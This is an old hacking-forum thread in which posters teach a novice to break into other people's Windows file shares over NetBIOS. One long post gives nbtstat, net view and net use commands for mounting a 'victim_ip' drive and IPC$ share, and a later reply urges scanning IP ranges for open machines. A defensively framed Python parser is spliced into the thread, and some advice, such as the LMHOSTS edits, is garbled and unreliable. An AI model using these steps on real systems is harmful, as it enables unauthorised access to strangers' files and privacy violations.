NetBIOS

A safe place for newbies. You won't get flamed here, as long as you've put in some effort before posting (i.e: Google)...
NetBIOS

Post by industri_ma » Sun Nov 10, 2002 12:35 pm

OK, I don't know why I even took my time to do this, I guess I was bored... Anyway, in the "Hacking with NetBIOS" tutorial, at the end it says "Now go out and scan a network or a computer for port 21 open", it says something like that... but port 21 is the FTP port and 139 is the real NetBIOS port. Tell me if I'm wrong about this!

No...you are correct

Post by chieftan » Sun Nov 10, 2002 2:08 pm

You will actually find that ports 137, 138 and 139 use NetBIOS and ports 20 and 21 use FTP.

The reason that it says port 21 is that you will need this for the file transfers.....

Ok.......

Post by industri_ma » Sun Nov 10, 2002 2:43 pm

Ok.....

Post by YoGi » Sun Nov 10, 2002 3:05 pm

FTP usually has shares on it....
-----YoGi-----

I'm naked under all my clothes.....

Post by Silverbullet951 » Sat Nov 30, 2002 12:41 pm

Hi, I'm extremely new to all of this. Now, how come I can't find any hosts? It always tells me that there is no host found. Why is that? Thanks a lot.

Post by industri_ma » Sat Nov 30, 2002 1:35 pm

That means that the host doesn't exist or it doesn't have NetBIOS enabled!

Post by Silverbullet951 » Sun Dec 01, 2002 12:41 am

Thanks. Let's say, if I were to get into one, how do I use LMHOSTS? Thanks again, I'm sure I'll be able to get used to it pretty soon.

Post by industri_ma » Sun Dec 01, 2002 9:17 am

You search for the LMHOSTS file, then you open it with a text program like WordPad, then look for the line #DOM:<domain> and write the IP like this: #DOM:127.0.0.1

Post by Silverbullet951 » Sun Dec 01, 2002 1:23 pm

I tried it on my friend's computer and it worked. He has Win 98, I have Win XP and none of the IPs work. Could XP be the problem?

Post by Silverbullet951 » Sun Dec 01, 2002 1:24 pm

Also, how can I get more IP addresses on my computer? I only have two. Thanks.

jeesh

Post by weazy » Sun Dec 01, 2002 1:52 pm

If it weren't for NetBIOS, it seems like we wouldn't have anything to talk about on this forum.

BTW

Post by weazy » Sun Dec 01, 2002 1:53 pm

I have posted a poll under the introduction forum. Please take 2 picoseconds to respond.

sk8

Post by sk8 » Sat Dec 21, 2002 6:07 pm

NetBIOS stands for Network Basic Input Output System and is used in Windows for its file and printer sharing.

To use NetBIOS remotely the computer has to have it running and unprotected first. To find out if a computer has NetBIOS, boot up your favourite portscanner and look for NetBIOS:

25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn

If your results look like that then you're set...

About nbtstat

To get the info you need for the attack we use a program called nbtstat:

Open up your console in WinXP, or a DOS prompt in earlier Windows versions.

code:--------------------------------------------------------------------------------
c:\>nbtstat -A 127.0.0.1
--------------------------------------------------------------------------------

Use -A if you're using IP addresses. If you're going to use hostnames, use -a.

This will give you what is called a nametable:


code:--------------------------------------------------------------------------------
Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
computername <00> UNIQUE Registered
workgroupname <00> GROUP Registered
computername <20> UNIQUE Registered
workgroupname <1E> GROUP Registered
workgroupname <1D> UNIQUE Registered
..__MSBROWSE__. <01> GROUP Registered

MAC Address = xx-xx-xx-xx-xx-xx
--------------------------------------------------------------------------------


This is a friend's nametable (as I am not running Windows). Names and workgroups have been edited to save him from elite_hax0rs.

Now, the line

code:--------------------------------------------------------------------------------
computername <20> UNIQUE Registered
--------------------------------------------------------------------------------

is the interesting one, as <20> means that file sharing is enabled: that means we can try to connect to that computer.
First, we need to know their hard drive names etc., and we need to see if it's XP and if they have SharedDocs. To do this we use net view \\ipaddress


code:--------------------------------------------------------------------------------
C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name Type Used as Comment

-----------------------------------
SharedDocs Disk
The command completed successfully.
--------------------------------------------------------------------------------


That's the result you should get (it will be different on a non-WinXP box).

Now comes the interesting part: we want to use and browse the person's hard drive just like it was local. For doing that, we use a program called net use:
net use letter: \\ipaddress\name

code:--------------------------------------------------------------------------------
c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.
--------------------------------------------------------------------------------


Now their hard drive is "mirrored" to the drive letter we specified (so make sure it's not a drive that already exists on your computer). Now just browse it as you would a local drive (switch drives by typing the drive letter; `cd g:` alone would only show G:'s current directory):

code:--------------------------------------------------------------------------------
c:\>g:
g:\>
--------------------------------------------------------------------------------


In Windows XP (not sure about other Windows versions) you can open up "My Computer": the drive you just added will be there for you to browse in all the GUI goodness.
When you're done, make sure you remove the shared drive from your machine:

code:--------------------------------------------------------------------------------
c:\>net use g: /delete
g: was deleted successfully.
--------------------------------------------------------------------------------


Some systems may be locked with passwords (Win2k, WinNT).
If you know the password, you would use this command (the password follows the share name, and /user: picks the account):

code:--------------------------------------------------------------------------------
net use \\ip\sharename password /user:username
--------------------------------------------------------------------------------
(not sure about that one...)



Moral of this story: always cover port 139.

(Win2000 and WinXP also listen on port 445 for SMB service directly over TCP. Port 139 is like "SMB over NetBIOS over TCP") (sort of)...

Moral of this follow-up: if you run W2k or WXP, always cover port 139 AND 445.



GOD DAMN, WHERE IS THAT CODE BUTTON? I HAD TO TYPE STRIPES ALL THE @#! TIME. /me thinks that he should fix it =p

Now someone would ask "So when you port scan a system and NetBIOS services are open you can just use net to connect and rummage through their directories?"

and I'll answer him:
"Sometimes...

Depends if there are actually drives shared, and depends on if passwords are set."

To connect to a Windows NT/2k share:

-------------------------------------------------------------------------------
c:\>net use \\victim_ip\ipc$ password /user:username

c:\>net view \\victim_ip

c:\>net use * \\victim_ip\share
-------------------------------------------------------------------------------

Another one would ask... "If you have a firewall, doesn't it protect all ports?"

and I would answer "Blocking the NetBIOS ports is a good start, but if I were you I would like to go a step further and uninstall NetBIOS altogether." (That's a different story, I'll explain it some other time =p)

I could explain how to hack NetBIOS with Linux or explain how NetBIOS works, but I am too lazy now =p
Maybe another time when I am not bored =p

Well... as I can see, I can STILL remember all that Windows shit =)
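The <20> row in the nametable above is the whole point of the post, so here is an added example (not from this thread or any of its posters) of reading an `nbtstat -A` table programmatically, the way a defender auditing their own hosts would: it parses the rows, decodes the common suffix bytes, and flags a registered File Server name as "cover TCP 139/445 or disable NetBIOS over TCP/IP". The sample output, the host names and the 192.0.2.0/24 addresses are constructed.

```python
import re

# Constructed "nbtstat -A <ip>" output shaped like the table posted in this
# thread (names are made up; 192.0.2.0/24 is documentation address space).
SAMPLE_NBTSTAT = """\
Node IpAddress: [192.0.2.10] Scope Id: []
       Name               Type         Status
    ---------------------------------------------
    WORKSTATION7   <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    WORKSTATION7   <20>  UNIQUE      Registered
    WORKGROUP      <1E>  GROUP       Registered
    WORKGROUP      <1D>  UNIQUE      Registered
    ..__MSBROWSE__. <01>  GROUP       Registered
    MAC Address = 00-00-5E-00-53-01
"""

# Meaning of the common suffix bytes; <20> UNIQUE is the File Server service.
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation service (computer name)",
    ("00", "GROUP"): "domain or workgroup name",
    ("20", "UNIQUE"): "File Server service (shares offered over TCP 139/445)",
    ("1D", "UNIQUE"): "master browser",
    ("1E", "GROUP"): "browser service elections",
    ("01", "GROUP"): "master browser group (__MSBROWSE__)",
}

# One name-table row: name, <suffix>, UNIQUE|GROUP, status. Header lines don't match.
ROW_RE = re.compile(r"^\s*(\S+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")

def parse_name_table(text):
    """Return [(name, suffix, type, status), ...] from nbtstat -A output."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            name, suffix, ntype, status = m.groups()
            rows.append((name, suffix.upper(), ntype, status))
    return rows

def assess(text):
    """Summarise what a name table tells a defender about one of their own hosts."""
    rows = parse_name_table(text)
    exposed = any((s, t) == ("20", "UNIQUE") for _, s, t, _ in rows)
    return {
        "computer_name": next((n for n, s, t, _ in rows if (s, t) == ("00", "UNIQUE")), None),
        "workgroup": next((n for n, s, t, _ in rows if (s, t) == ("00", "GROUP")), None),
        "services": [SUFFIX_MEANING.get((s, t), f"unknown suffix <{s}>") for _, s, t, _ in rows],
        "file_sharing_exposed": exposed,
        "action": "block TCP 139/445 or disable NetBIOS over TCP/IP" if exposed else "no file server registered",
    }
```

Feed it the saved output of `nbtstat -A` against a machine you administer; a `file_sharing_exposed` result on a host that faces an untrusted network is exactly the situation the "always cover port 139 AND 445" advice is about.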

Post by Silverbullet951 » Sat Dec 21, 2002 9:15 pm

Thanks for the info. Now, how do I check for open ports? Do I need a special program? Thanks, and BTW, I would really like to know how to use Linux to hack a NetBIOS. That would be really helpful.

Post by Silverbullet951 » Sat Dec 21, 2002 10:11 pm

OK, I did a scan, pop-3 110 was open, now what? I tried to use NetBIOS, but it said Host not found. Why is that?

sk8

Post by sk8 » Sun Dec 22, 2002 8:19 am

Umm, to find an open port, scan certain IP ranges till you find a port open. Then use the methods described above and connect to the system.

I'll explain another time how to hack into NetBIOS using Linux, too bored now q=

Post by weazy » Fri Dec 27, 2002 9:41 pm

There are several good tutorials on NetBIOS hacking at hackerthreads.org. Also, search the forum for NetBIOS; you will find a lot of info on this topic.

weazy
--The Devil is in the Details--